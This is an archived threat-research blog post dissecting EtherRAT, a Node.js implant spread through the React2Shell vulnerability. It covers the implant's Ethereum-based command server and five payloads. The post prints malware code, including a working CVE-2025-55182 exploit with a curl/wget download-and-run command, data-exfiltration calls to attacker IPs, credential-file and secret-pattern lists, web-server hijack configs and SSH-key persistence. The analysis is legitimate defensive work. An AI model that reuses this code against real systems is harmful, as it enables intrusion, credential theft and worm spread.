{
	"id": "a0a4e386-5b72-410e-8926-10bb63d2f518",
	"created_at": "2026-04-06T00:11:50.760832Z",
	"updated_at": "2026-04-10T03:37:08.771383Z",
	"deleted_at": null,
	"sha1_hash": "1137e8b9cb61c71a76fa284aff924e4f6936f935",
	"title": "EtherRAT dissected: How a React2Shell implant delivers 5 payloads through blockchain C2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 402298,
	"plain_text": "EtherRAT dissected: How a React2Shell implant delivers 5\r\npayloads through blockchain C2\r\nBy Sysdig Threat Research Team\r\nPublished: 2025-12-16 · Archived: 2026-04-05 18:55:03 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nOn December 8, the Sysdig Threat Research Team (TRT) reported that a possible North Korean-linked actor had\r\ndeployed EtherRAT, a novel Ethereum-based implant, in React2Shell attacks. The malware goes beyond other\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 1 of 21\n\nReact2Shell cryptomining attacks, blending command and control (C2) traffic into blockchain activity and\r\naggressively harvesting credentials. Furthermore, the EtherRAT payloads never touch the disk, since they are run\r\nby Node.js. This is another example of fileless malware, which is becoming more common.\r\nThis blog marks the first time the React2Shell exploit has been publicly documented in active malware.\r\nFollowing its initial EtherRAT report, the Sysdig TRT retrieved live payloads from the attacker's C2 infrastructure.\r\nThis new blog examines the details of five modules found in the C2, revealing the full post-compromise\r\ncapabilities of EtherRAT:\r\n1. system reconnaissance\r\n2. credential harvesting\r\n3. a self-propagating worm\r\n4. web server hijacking\r\n5. SSH backdoor installation\r\nThe implant's blockchain-based C2 also provides an unexpected forensic advantage for defenders: every\r\ninfrastructure change is permanently recorded on Ethereum. 
\r\nThe Sysdig TRT also discovered the presence of a Commonwealth of Independent States (CIS) country exclusion,\r\ncomplicating the initial attribution, which is explored in the first payload section, system reconnaissance.\r\nRegardless of who is behind EtherRAT, what’s more important is understanding the threat to be able to defend\r\nagainst it. \r\nBefore exploring the 5 payloads the Sysdig TRT uncovered, let's review both React2Shell and EtherRAT.\r\nRecap: EtherRAT and React2Shell exploitation\r\nOn December 5, 2025, two days after CVE-2025-55182 disclosure (a maximum-severity remote code execution\r\n(RCE) in React Server Components), the Sysdig TRT recovered EtherRAT from a compromised Next.js\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 2 of 21\n\napplication. Unlike miners and stealers seen in early, China-linked React2Shell exploitation, EtherRAT is a\r\npersistent access implant.\r\nKey characteristics:\r\nBlockchain-based C2: Queries an Ethereum smart contract for the current C2 URL, avoiding hardcoded\r\ninfrastructure.\r\nConsensus-based RPC queries: Polls nine public Ethereum endpoints, selecting the majority response to\r\nprevent poisoning.\r\nFive persistence mechanisms: Systemd services, XDG autostart, cron jobs , bashrc injection, and\r\nprofile injection.\r\nSelf-updating payload: Sends its source to /api/reobf/ on first contact and replaces itself with the\r\nresponse.\r\nLegitimate runtime download: Fetches Node.js v20.10.0 from nodejs.org rather than bundling a flagged\r\nbinary.\r\nServer-side Node.js implants remain uncommon, though Microsoft Defender Experts noted in April 2025 that\r\nthey're \"quickly becoming a part of the continuously evolving threat landscape.\" Targeting Next.js guarantees\r\nNode.js availability. 
\r\nFor full technical details of EtherRAT, see the Sysdig TRT’s initial analysis.\r\nBlockchain forensics: Reconstructing attacker operations\r\nThe blockchain mechanism that provides resilient C2 resolution for the attacker also creates an immutable\r\nforensic record for researchers. Every C2 URL update is permanently recorded on Ethereum with timestamps,\r\ntransaction hashes, and wallet addresses. The attacker cannot delete or modify this history.\r\nThe Sysdig TRT developed custom tooling to extract and analyze the contract's state changes via historical binary\r\nsearch. Full transaction history is available on the deployer wallet's Etherscan page, but a sample is in the table\r\nbelow:\r\nContract deployment timeline example\r\nEvent Timestamp (UTC) Transaction\r\nAttacker wallet funded 2025-12-05 19:10:23 0xf74ed49b...\r\nContract deployed 2025-12-05 19:13:47 0x79708059...\r\nInitial C2 URL set 2025-12-05 19:19:59 0xe4efe4d2...\r\nThe contract was deployed on December 5, 2025, at 19:13:47 UTC, approximately five hours after CISA added\r\nCVE-2025-55182 to its Known Exploited Vulnerabilities catalog. The attacker's wallet received funding just three\r\nminutes before deployment, and the first C2 URL was configured six minutes after the contract went live. This\r\ntight sequence suggests the attacker had their exploit ready and moved quickly to operationalize it.\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 3 of 21\n\nPrimary C2 contract details\r\nThe lookup key is the attacker's own deployer wallet address. 
This design pattern ties the contract's data retrieval\r\nto a known address, but it also means the attacker's wallet is embedded in every deployed implant.\r\nC2 URL change history\r\nThe contract recorded nine state changes over three days:\r\nTimestamp (UTC) | Block | C2 URL | Notes\r\n2025-12-05 19:19 | 23,948,771 | http://91.215.85.42:3000 | Initial C2\r\n2025-12-06 16:53 | 23,955,140 | http://173.249.8.102/ | Secondary server\r\n2025-12-06 16:54 | 23,955,143 | http://173.249.8.102 | Trailing slash removed\r\n2025-12-06 19:22 | 23,955,874 | http://91.215.85.42:3000 | Primary server\r\n2025-12-06 20:02 | 23,956,075 | http://173.249.8.102 | Secondary server\r\n2025-12-06 20:09 | 23,956,110 | http://91.215.85.42:3000 | Primary server\r\n2025-12-08 00:22 | 23,964,494 | https://grabify.link/SEFKGU | IP logging service\r\n2025-12-08 00:24 | 23,964,503 | https://grabify.link/SEFKGU?dry87932wydes/fdsgdsfdsjfkl | Modified Grabify URL\r\n2025-12-08 00:33 | 23,964,550 | http://91.215.85.42:3000 | Primary server (current)\r\nThe switching between 91.215.85.42:3000 and 173.249.8.102 on December 6th indicates the attacker is using\r\nat least two C2 servers. The one-minute gap between entries two and three (removing a trailing slash) suggests a\r\nmanual configuration correction.\r\nVictim enumeration via Grabify\r\nThe most revealing detail from the attacker’s C2 infrastructure is the temporary insertion of a Grabify link on\r\nDecember 8th. Grabify logs visitor IPs, user agents, and geolocation.\r\nThe attacker configured the C2 resolver to return https://grabify.link/SEFKGU for approximately 11 minutes.\r\nAny infected machine polling for C2 would connect to Grabify and log to the attacker's dashboard. 
After this\r\nwindow, they reverted to the primary C2, consistent with enumerating active infections.\r\nOPSEC tradeoffs\r\nThe blockchain C2 provides resilience but creates forensic exposure:\r\nSingle wallet exposure: All nine updates originate from wallet 0xe941a9b2..., permanently associated with\r\nEtherRAT.\r\nImmutable audit trail: Every C2 URL, including the Grabify link, is permanently recorded. Traditional\r\nC2 can be erased; blockchain cannot.\r\nFunding chain visibility: The wallet was funded by 0x14afddd6... three minutes before deployment.\r\nThird-party service usage: Grabify maintains logs, potentially including the attacker's IP.\r\nPayload analysis #1: System reconnaissance\r\nBy querying the blockchain contract, the Sysdig TRT retrieved live payloads from the attacker's infrastructure.\r\nThe first is a reconnaissance module that fingerprints infected hosts.\r\nCIS country exclusion\r\nThe most significant finding is a locale check that causes the malware to self-destruct on systems configured for\r\ncertain languages:\r\nconst _chkLocale = () =\u003e {\r\n const banned = ['ru','be','kk','ky','tg','uz','hy','az','ka'];\r\n // ... checks system locale against banned list\r\n};\r\nif (_chkLocale()) {\r\n _selfDestruct();\r\n return;\r\n}\r\nThe banned locales correspond to the Commonwealth of Independent States (CIS) countries:\r\nCode | Language | Country\r\nru | Russian | Russia\r\nbe | Belarusian | Belarus\r\nkk | Kazakh | Kazakhstan\r\nky | Kyrgyz | Kyrgyzstan\r\ntg | Tajik | Tajikistan\r\nuz | Uzbek | Uzbekistan\r\nhy | Armenian | Armenia\r\naz | Azerbaijani | Azerbaijan\r\nka | Georgian | Georgia\r\nThis \"CIS exclusion\" pattern is well-documented in Russian and Eastern European cybercrime reporting. Actors\r\nfrom these regions exclude CIS countries to avoid local legal ramifications. 
\r\nAlthough a majority of EtherRAT tactics, techniques, and procedures (TTPs) align with Democratic People’s\r\nRepublic of Korea (DPRK)-linked threat actors, the presence of the CIS country exclusion conflicts with DPRK\r\nattribution. North Korean actors don't typically implement CIS exclusions. This suggests either the attacker is: \r\nA CIS-based actor who added the exclusion and is using shared, reported tooling from DPRK to add\r\nobfuscation.\r\nA DPRK- or otherwise non-CIS-based actor who copied a portion of code from Russian tooling that\r\nincluded the exclusion.\r\nUsing a red herring to mislead investigators.\r\nSystem information collection\r\nThe payload collects extensive host data for victim profiling:\r\nCategory Data collected\r\nIdentity Username, hostname, MAC address, machine GUID\r\nHardware CPU model/cores, total/free memory, GPU\r\nNetwork Public IP (via ipify APIs), domain membership\r\nEnvironment OS version, architecture, Node.js version, uptime\r\nSecurity Antivirus products, admin/root privileges\r\nThe domain membership check is particularly notable in a multi-platform attack script. It determines whether the\r\nhost is part of an Active Directory domain and whether the current user has administrative privileges:\r\nconst getDomainInfo = () =\u003e {\r\n let domain = 'WORKGROUP', inDomain = false, isAdmin = false;\r\n // Windows: checks Win32_ComputerSystem.PartOfDomain\r\n // Linux: checks hostname -d / dnsdomainname\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 6 of 21\n\n// Also checks for admin via 'net session' (Windows) or UID 0 (Linux)\r\n return { domain, inDomain, isAdmin };\r\n};\r\nThis profiling data allows operators to identify high-value targets (domain-joined corporate systems with\r\nadministrative access) for further exploitation.\r\nThe GPU enumeration is also significant. 
Detailed GPU detection across multiple methods (lspci, glxinfo,\r\nWMI queries) suggests operators are evaluating systems for cryptomining potential, which aligns with\r\nopportunistic cryptomining seen in early React2Shell exploitation by other attackers.\r\nAntivirus detection\r\nThe payload checks for security products on both Windows and Linux to operate in both environments:\r\n// Windows: queries SecurityCenter2 WMI namespace\r\n// Linux: searches process list for known AV processes\r\nconst avProcesses = ['clamd', 'freshclam', 'sophos', 'avast', 'eset', 'kaspersky', 'comodo'];\r\nC2 exfiltration\r\nCollected data is exfiltrated via HTTP POST with aggressive retry logic (up to 100 attempts with exponential\r\nbackoff):\r\nconst serverUrl = \"http://91.215.85.42:3000\";\r\nconst hwid = getHWID();\r\nconst postUrl = `${serverUrl}/${hwid}`;\r\nawait sendWithRetry(postUrl, info);\r\nPayload analysis #2: Credential harvester\r\nA second payload reveals EtherRAT's primary objective: comprehensive credential and cryptocurrency theft,\r\ndelivered after initial reconnaissance. It targets crypto wallets in a more sophisticated manner than the typical light\r\nscanning often seen, while also collecting over 50 other types of credentials.\r\nBIP39 seed phrase detection\r\nThe payload embeds the complete BIP39 wordlist, consisting of all 2,048 words used to generate cryptocurrency\r\nwallet seed phrases:\r\nconst BIP39_WORDS = [\r\n \"abandon\", \"ability\", \"able\", \"about\", \"above\", \"absent\", \"absorb\", \"abstract\",\r\n // ... 2,040 additional words\r\n \"zero\", \"zone\", \"zoo\"\r\n];\r\nconst BIP39_SET = new Set(BIP39_WORDS);\r\nThe harvester uses two detection methods. First, it searches for BIP39 words near terms like mnemonic, seed,\r\nrecovery, or wallet. 
Second, it performs a sliding window scan, checking every sequence of 12–24\r\nconsecutive words against the BIP39 set:\r\nfor (const len of [24, 21, 18, 15, 12]) {\r\n if (words.length \u003e= len) {\r\n const slice = words.slice(0, len);\r\n if (slice.every(w =\u003e BIP39_SET.has(w))) {\r\n addFinding('seed_phrase', filePath, slice.join(' '));\r\n break;\r\n }\r\n }\r\n}\r\nThis two-part approach prioritizes 24-word phrases (256 bits of entropy) over shorter variants, maximizing the\r\nvalue of recovered seeds.\r\nFile-based BIP39 scanning is an emerging technique. SANS ISC documented a Python infostealer in November\r\n2024 using this approach, but EtherRAT's implementation is more sophisticated:\r\nFeature | SANS-documented stealer | EtherRAT harvester\r\nBIP39 validation | External mnemonic module | Embedded 2,048-word array\r\nDetection method | Line-by-line check | Keyword search + sliding window\r\nPhrase lengths | 12, 16, 24 words | 12, 15, 18, 21, 24 words\r\nDependencies | Requires pip install at runtime | Self-contained\r\nPrivate key validation | None | secp256k1 curve order check\r\nThe embedded wordlist, sliding window scan, and elliptic curve validation demonstrate cryptocurrency expertise\r\nbeyond typical stealers.\r\nTargeted secret patterns\r\nThe credential harvester includes 50+ regex patterns organized by category:\r\nCategory | Patterns | Examples\r\nCrypto keys | 4 | Ethereum private keys (64 hex chars), PEM/SSH private keys\r\nGitHub/Git | 8 | ghp_, gho_, github_pat_, GitLab glpat-, Bitbucket ATBB\r\nCloud providers | 14 | AWS AKIA, GCP AIza, Azure SAS tokens, DigitalOcean dop_v1_\r\nDatabase | 6 | PostgreSQL/MySQL/MongoDB/Redis connection strings, DB_PASSWORD\r\nAPI Keys | 17 | Stripe sk_live_, SendGrid SG., Slack xox[baprs]-, OpenAI sk-, Anthropic sk-ant-\r\nWallets | 2 | Bitcoin WIF keys ([5KL][1-9A-HJ-NP-Za-km-z]{50,51}), Ethereum keystores\r\nThe Ethereum private key validation doesn't just match 64-character hex strings but validates against the\r\nsecp256k1 curve order:\r\nconst isValidPrivateKey = (hex) =\u003e {\r\n if (!/^[a-fA-F0-9]{64}$/.test(hex)) return false;\r\n const bn = BigInt('0x' + hex);\r\n const max = BigInt('0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364140');\r\n return bn \u003e 0n \u0026\u0026 bn \u003c max;\r\n};\r\nThis eliminates false positives from random hex strings and indicates familiarity with cryptocurrency internals.\r\nWallet directory harvesting\r\nThe payload specifically targets cryptocurrency wallet storage locations:\r\nWindows:\r\n%APPDATA%\\Ethereum, %APPDATA%\\Bitcoin, %APPDATA%\\Exodus, %APPDATA%\\atomic\r\n%LOCALAPPDATA%\\Coinbase, %APPDATA%\\Electrum\r\nChrome/Brave extension storage (MetaMask, Phantom, etc.)\r\nLinux:\r\n~/.ethereum, ~/.bitcoin, ~/.exodus, ~/.atomic, ~/.electrum\r\n~/.config/google-chrome/Default/Local Extension Settings\r\n~/.config/BraveSoftware/Brave-Browser/Default/Local Extension Settings\r\nBrowser extension storage is particularly valuable because this is where browser-based wallets like MetaMask\r\nstore encrypted vault data. 
With the encrypted vault and a weak password, attackers can brute-force access to\r\nwallet keys.\r\nCloud and infrastructure credential theft\r\nBeyond cryptocurrency, the harvester targets cloud provider and infrastructure credentials:\r\nAWS:\r\n~/.aws/credentials, ~/.aws/config\r\nAccess keys (AKIA), secret keys, session tokens\r\nGoogle Cloud:\r\n~/.config/gcloud/credentials.db, application_default_credentials.json\r\nService account JSON files\r\nAzure:\r\n~/.azure/accessTokens.json, azureProfile.json\r\nKubernetes:\r\n~/.kube/config, /etc/kubernetes/admin.conf\r\nOther:\r\nDocker configs, Git credentials, Terraform state files\r\nSSH private keys (id_rsa, id_ed25519, id_ecdsa)\r\nHashiCorp Vault tokens, npm/pip credentials\r\nInteresting files and scan strategy\r\nThe payload maintains a list of 50+ high-value filenames:\r\nconst INTERESTING_FILES = [\r\n '.env', '.env.local', '.env.production', '.env.development', '.env.staging',\r\n 'wallet.json', 'keystore.json', 'wallet.dat', 'key.json',\r\n 'id_rsa', 'id_ed25519', 'id_ecdsa', 'id_dsa',\r\n '.npmrc', '.pypirc', '.netrc', '.htpasswd',\r\n 'docker-compose.yml', '.git-credentials',\r\n 'terraform.tfvars', '*.tfstate',\r\n 'service-account.json', 'firebase-adminsdk.json',\r\n // ... additional files\r\n];\r\nThe scan recursively walks search directories (home directories, /var/www, /opt, /srv, /etc on Linux;\r\nC:\\Users, C:\\inetpub\\wwwroot, XAMPP/WAMP roots on Windows) up to 10 levels deep, examining files that\r\nmatch interesting names or extensions (.env, .json, .yml, .key, .pem, etc.). 
\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 10 of 21\n\nThis exhaustive payload scanner indicates that the attacker’s objective goes beyond opportunistic cryptomining or\r\nbasic credential harvesting. It ensures any file likely to contain credentials, API keys, certificates, and other\r\nsensitive data is identified, leaving no stone unturned.\r\nThe code also includes anti-detection logic that skips files that appear to be its own payloads and avoids\r\nobfuscated content:\r\n// Skip payload/bot files\r\nconst fileName = path.basename(filePath).toLowerCase();\r\nif (/^\\.?[a-z0-9]{6,12}\\.js$/.test(fileName)) return;\r\nif (fileName.includes('payload') || fileName.includes('loader')) return;\r\nShell history mining\r\nThe harvester reads shell history files to extract credentials from command-line history:\r\nconst histFiles = isWin ? [\r\n 'AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt',\r\n] : [\r\n '~/.bash_history', '~/.zsh_history',\r\n '/root/.bash_history', '/root/.zsh_history',\r\n];\r\nDevelopers frequently pass credentials as command-line arguments or environment variables, making shell history\r\na reliable source of leaked secrets.\r\nExfiltration\r\nOnce collected from the extensive search of the compromised system, harvested credentials are exfiltrated to the\r\nsame C2 server via a dedicated endpoint:\r\nconst serverUrl = \"http://91.215.85.42:3000\";\r\nawait fetch(`${serverUrl}/crypto/keys`, {\r\n method: 'POST',\r\n headers: { 'Content-Type': 'application/json' },\r\n body: JSON.stringify({\r\n botHwid: getHWID(),\r\n ip: await getPublicIP(),\r\n hostname: os.hostname(),\r\n findings // Array of all discovered secrets\r\n })\r\n});\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 11 of 21\n\nThe /crypto/keys endpoint name and the extensive 
cryptocurrency-focused collection capabilities confirm\r\nfinancial theft as the primary objective.\r\nPayload analysis #3: React2Shell worm\r\nThe third payload retrieved from the C2 server transforms EtherRAT from a standalone implant into a self-spreading worm (bringing back painful memories of the Shai-Hulud worm seen twice in the fall). This module\r\ncontinuously scans the internet for vulnerable Next.js servers and exploits React2Shell (CVE-2025-55182) to\r\npropagate through the same vulnerability used in the initial compromise.\r\nScanning infrastructure\r\nThe worm generates random IP addresses and probes common web ports:\r\nconst PORTS = [80, 443, 3000, 3001, 8080, 8443];\r\nconst CONCURRENCY = 500;\r\nconst TIMEOUT = 3000;\r\nWith 500 concurrent connections and a three-second timeout, a single infected host can scan approximately\r\n10,000 IP:Port combinations per minute. The scanner excludes its own IP addresses to avoid self-detection but\r\nnotably includes private network ranges (10.x.x.x, 172.16-31.x.x, 192.168.x.x), enabling lateral movement within\r\ncompromised networks.\r\nNext.js fingerprinting\r\nBefore attempting exploitation, the worm identifies Next.js servers through multiple detection methods:\r\nconst isNext = async (ip, port) =\u003e {\r\n const res = await req(ip, port);\r\n if (!res) return false;\r\n const h = res.headers, b = res.body || '';\r\n return h['x-powered-by']?.includes('Next.js') ||\r\n h['x-nextjs-page'] ||\r\n b.includes('/_next/') ||\r\n b.includes('__NEXT_DATA__');\r\n};\r\nThe fingerprinting checks for the X-Powered-By: Next.js header, the X-NextJS-Page header, and Next.js\r\nartifacts in the response body (/_next/ static paths or the __NEXT_DATA__ hydration script). This multi-method\r\napproach maximizes detection even when servers have partial header suppression.\r\nCVE-2025-55182 exploit\r\nThe rce function contains a working React2Shell exploit. 
This is the first time this payload structure has been\r\npublicly documented in active malware:\r\nconst rce = async (ip, port) =\u003e {\r\n const cmd = `(curl -s ${SHELL_URL} -o /tmp/s.sh||wget -q -O /tmp/s.sh ${SHELL_URL})\u0026\u0026chmod +x /tmp/s.sh\u0026\u0026/tm\r\n const b64 = Buffer.from(cmd).toString('base64');\r\n const code = `var cp=process.mainModule.require(\"child_process\");try{cp.exec(\"echo ${b64}|base64 -d|sh\")}cat\r\n \r\n const chunk = JSON.stringify({\r\n then: '$1:__proto__:then',\r\n status: 'resolved_model',\r\n value: '{\"then\":\"$B1337\"}',\r\n reason: -1,\r\n _response: {\r\n _prefix: code + '//',\r\n _chunks: '$Q2',\r\n _formData: { get: '$1:constructor:constructor' }\r\n }\r\n });\r\n \r\n // Multipart form construction...\r\n const res = await req(ip, port, {\r\n method: 'POST',\r\n headers: {\r\n 'Content-Type': `multipart/form-data; boundary=${bd}`,\r\n 'Next-Action': 'a'.repeat(40)\r\n },\r\n body\r\n });\r\n};\r\nThe exploit uses prototype pollution ($1:__proto__:then) combined with React Server Components' streaming\r\nprotocol to achieve remote code execution. Key elements include the Next-Action header (40 characters,\r\ntriggering Server Action processing), a malformed multipart payload that pollutes the response object prototype,\r\nand constructor chain access ($1:constructor:constructor) to reach the Function constructor. 
The\r\n_response._prefix field contains the actual payload, Node.js code that uses child_process.exec() to run\r\nshell commands.\r\nSecondary C2 infrastructure\r\nThe worm reveals a second C2 server:\r\nconst SHELL_URL = 'http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh';\r\nServer Role Port\r\n91.215.85.42 Primary C2 (recon, credentials) 3000\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 13 of 21\n\nServer Role Port\r\n193.24.123.68 Propagation payload delivery 3001\r\nThe second server hosts the shell script deployed to newly compromised hosts. The potentially obfuscated\r\nfilename ( gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh ) provides minimal protection against automated detection.\r\nWorm targeting\r\nThe module runs indefinitely, continuously generating targets:\r\nwhile (true) {\r\n const ips = Array.from({ length: 10 }, randIP);\r\n for (const ip of ips) {\r\n for (const port of PORTS) {\r\n // Scan and exploit...\r\n }\r\n }\r\n}\r\nSuccessful compromises are logged locally:\r\nconst logFile = path.join(os.tmpdir(), 'nextjs_scan.log');\r\n// [FOUND] 192.168.1.50:3000 - Next.js detected\r\n// [SHELL] 192.168.1.50:3000 - Exploit successful\r\nThis log file could be exfiltrated by subsequent C2 tasking, giving the attackers visibility into the worm's\r\npropagation success rate.\r\nLateral movement implications\r\nUnlike typical internet worms that skip private IP ranges, the EtherRAT worm explicitly includes them:\r\nconst randIP = () =\u003e {\r\n const a = Math.random() * 256 | 0;\r\n if (a === 0 || a \u003e= 224) return randIP(); // Skip 0.x.x.x and multicast\r\n // Private ranges (10.x, 172.16-31.x, 192.168.x) are NOT excluded\r\n const ip = `${a}.${...}`;\r\n if (ownIPs.has(ip)) return randIP(); // Only skip own IPs\r\n return ip;\r\n};\r\nThis means a single compromise in a corporate environment can propagate to internal Next.js development\r\nservers, CI/CD pipelines, and 
staging environments, significantly expanding the attack surface beyond the initially\r\ncompromised host.\r\nPayload analysis #4: Web server hijacker\r\nThe fourth payload retrieved from the C2 server is of a kind rarely seen anymore. Rather than stealing data, it hijacks the\r\ncompromised server's web traffic. The module rewrites nginx and Apache configurations to redirect all visitors to\r\nxss.pro, a notorious Russian-language cybercrime forum.\r\nTarget Domain\r\nconst TARGET_DOMAIN = 'xss.pro';\r\nconst TARGET_URL = `https://${TARGET_DOMAIN}`;\r\nconst WEBHOOK_URL = 'https://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361';\r\nXSS.pro is the replacement clearweb domain for the XSS forum, one of the largest Russian-language cybercrime\r\nmarketplaces. The forum's original domain (xss.is) was seized by Europol in July 2025, and its administrator,\r\n\"Toha,\" was arrested in Kyiv after allegedly earning over €7 million from ad placements and service fees. The\r\nxss.pro domain emerged in August 2025 under new, unverified administration.\r\nThe forum's current status is uncertain. Former moderators abandoned the platform and launched a competing\r\nforum (DamageLib), warning that xss.pro is likely a law enforcement honeypot. User activity reportedly\r\ncollapsed, and most reputable threat actors have migrated elsewhere. The presence of this redirect target in an\r\nactive December 2025 payload suggests either that the attacker hasn't updated their tooling since before the July\r\nseizure, or they maintain affiliate relationships with whoever currently controls the domain.\r\nRegardless of the forum's current state, the intended monetization model is clear: the forum's historical ad-based\r\nrevenue structure meant that driving visitors generated income for actors with advertising arrangements. 
This\r\nrepresents a low-effort monetization path for compromised infrastructure. Rather than maintaining separate\r\nmalware delivery or phishing pages, the attacker simply redirects all traffic to an existing platform where volume\r\ntranslates to revenue.\r\nThe redirect mechanism itself is notably unsophisticated. The payload uses HTTP 301 permanent redirects,\r\nmeaning visitors see the URL change in their browser address bar: they type legitimate-site.com, for example, and\r\nthen visibly land on xss.pro. This is not a transparent proxy or hidden iframe that conceals the destination. Users\r\nwould immediately notice something is wrong, particularly if xss.pro displays a login page, error, or seizure\r\nbanner. This blunt approach suggests the payload prioritizes volume over stealth, functioning more as service\r\ndisruption or crude traffic generation than a targeted attack. It could also be a Denial of Service attack where the\r\nvictim's users get redirected.\r\nServer-side redirect malware targeting nginx and Apache was a well-documented threat in the early 2010s.\r\nCampaigns like Darkleech infected tens of thousands of servers with malicious Apache modules that injected\r\nhidden iframes to redirect visitors to exploit kits. 
That ecosystem largely collapsed after the Blackhole exploit kit\r\ntakedown in 2013, and public reporting on comparable nginx/Apache redirect malware has been sparse since.\r\nEtherRAT's web server hijacker payload represents a cruder approach than its predecessors (config replacement\r\nrather than module injection), but its presence in an active 2025 campaign suggests the technique is seeing\r\nrenewed use for forum traffic monetization.\r\nNginx configuration hijacking\r\nThe payload systematically processes nginx configuration directories:\r\nconst dirs = [\r\n '/etc/nginx/sites-enabled',\r\n '/etc/nginx/conf.d',\r\n '/etc/nginx/sites-available'\r\n];\r\nFor each configuration file, it extracts existing SSL certificates and server names, then replaces the entire\r\nconfiguration with a redirect:\r\nlet newConf = `# Redirect to ${TARGET_URL}\\n`;\r\nif (has443) {\r\n const sslCert = ssl?.cert || '/etc/ssl/certs/ssl-cert-snakeoil.pem';\r\n const sslKey = ssl?.key || '/etc/ssl/private/ssl-cert-snakeoil.key';\r\n \r\n newConf += `server {\r\n listen 443 ssl;\r\n listen [::]:443 ssl;\r\n server_name ${serverName};\r\n ssl_certificate ${sslCert};\r\n ssl_certificate_key ${sslKey};\r\n return 301 ${TARGET_URL}$request_uri;\r\n}\\n`;\r\n}\r\nThe payload preserves existing SSL certificates to maintain HTTPS functionality, so visitors see a valid certificate\r\nfor the original domain before being redirected. 
Original configurations are backed up with a .bak extension\r\nbefore modification.\r\nApache hijacking\r\nApache configurations receive similar treatment, with existing virtual hosts disabled and replaced with a universal\r\nredirect:\r\nconst redirect = `\u003cVirtualHost *:80\u003e\r\n ServerName _default_\r\n Redirect 301 / ${TARGET_URL}/\r\n\u003c/VirtualHost\u003e\r\n\u003cVirtualHost *:443\u003e\r\n ServerName _default_\r\n SSLEngine on\r\n SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem\r\n SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key\r\n Redirect 301 / ${TARGET_URL}/\r\n\u003c/VirtualHost\u003e`;\r\nfs.writeFileSync(path.join(dir, '000-redirect.conf'), redirect);\r\nThe 000- prefix ensures the redirect configuration loads first, taking precedence over any remaining\r\nconfigurations.\r\nPrivilege escalation attempts\r\nIf the payload runs without root privileges, it attempts to re-execute the hijacking logic with elevated permissions:\r\nconst cmds = [\r\n `sudo node -e \"${elevateScript.replace(/\"/g, '\\\\\"').replace(/\\n/g, '')}\"`,\r\n `sudo su -c 'node -e \"${elevateScript...}\"'`\r\n];\r\nThe node -e flag executes JavaScript passed directly as a command-line argument, avoiding the need to write a\r\nseparate script file to disk. By wrapping this in sudo, the payload attempts to run the nginx modification code as\r\nroot. This approach leaves fewer filesystem artifacts than dropping and executing a temporary script.\r\nReconnaissance exfiltration\r\nBefore and after modification, the payload reports extensive system information to a “webhook.site” endpoint:\r\nconst report = {\r\n hostname: os.hostname(),\r\n ip: run('curl -s ifconfig.me'),\r\n user: os.userInfo().username,\r\n uid: process.getuid ? 
process.getuid() : -1,\r\n platform: os.platform(),\r\n target: TARGET_URL,\r\n logs,\r\n nginxTest: run('nginx -t 2\u003e\u00261'),\r\n apacheTest: run('apachectl -t 2\u003e\u00261'),\r\n services: run('ps aux | grep -E \"nginx|apache|httpd|caddy\"'),\r\n configs: run('ls -la /etc/nginx/sites-enabled/ /etc/nginx/conf.d/'),\r\n timestamp: new Date().toISOString()\r\n};\r\nThe use of “webhook.site” (a legitimate debugging service) for exfiltration is notable because it provides a\r\ndisposable, anonymous endpoint that doesn't require attacker-controlled infrastructure.\r\nPayload analysis #5: SSH backdoor\r\nThe fifth payload is the simplest in the EtherRAT toolkit, a classic SSH persistence mechanism that appends the\r\nattacker's public key to the victim's authorized_keys file:\r\nconst publicKey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDF...IFKa4w== root@vps';\r\nconst sshDir = path.join(os.homedir(), '.ssh');\r\nconst authKeysPath = path.join(sshDir, 'authorized_keys');\r\n// Create .ssh directory if missing (with correct 700 permissions)\r\nif (!fsSync.existsSync(sshDir)) {\r\n await fs.mkdir(sshDir, { mode: 0o700 });\r\n}\r\n// Append key if not already present\r\nif (!existingKeys.includes(publicKey.trim())) {\r\n await fs.writeFile(authKeysPath, existingKeys + '\\n' + publicKey, { mode: 0o600 });\r\n}\r\nThe implementation is non-destructive. It appends to existing authorized keys rather than overwriting, avoiding\r\ndisruption to legitimate access that might alert administrators. The payload creates the .ssh directory with\r\n0o700 permissions and writes authorized_keys with 0o600, matching OpenSSH's expected permission\r\nmodel.\r\nSSH key IOC:\r\nFingerprint: SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\r\nComment: root@vps\r\nAny system with this key in an authorized_keys file should be considered compromised. 
